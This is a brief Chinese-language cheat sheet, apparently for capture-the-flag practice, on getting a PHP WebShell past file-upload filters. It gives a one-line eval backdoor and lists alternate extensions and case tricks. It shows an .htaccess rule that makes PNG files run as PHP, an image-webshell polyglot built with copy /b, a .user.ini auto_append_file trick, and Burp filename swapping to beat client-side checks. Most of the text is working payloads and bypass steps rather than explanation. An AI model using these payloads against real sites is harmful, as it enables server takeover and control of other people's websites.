非法用户可以利用上传的恶意文件控制整个网站,这个恶意文件被称为WebShell,也可以称为一种网页后门。
用burpsuite里面的浏览器
1:
一句话木马webshell.php:<?php eval ($_POST['data']);?>
2:
文件后缀绕过:如果.php后缀被限制,可以尝试这些后缀(webshell内容一样):.phtml、.pht、.php3、.php4、.php5、.pHp(修改大小写)
<script language="php"> eval ($_POST['data']);</script>
若上述后缀都被限制,可以试试.htaccess
<FilesMatch "png">
setHandler application/x-httpd-php
</FilesMatch>
3.
图片码绕过:
.htaccess不允许上传,图片马可以上传,但是还不能运行。
cmd:copy /b 图片名.png+一句话木马.php 生成新文件名.png
实例分析:
上传成功后,找图片的位置:<div class="content-center">
接下来就考虑,改文件名,内容类型,内容
把获取的文件重新上传
出现乱码则使用antsword 去连接,找出flag
4.
.user.ini绕过
hello.php:<?php echo "hello";?>
.user.ini:auto_append_file=hello.png
hello.png:<?php echo"hacker!"; ?>
5.
客户端拦截
将filename修改为shell2.php,删掉图片对应的内容,右键选择Paste from file,选择shell.php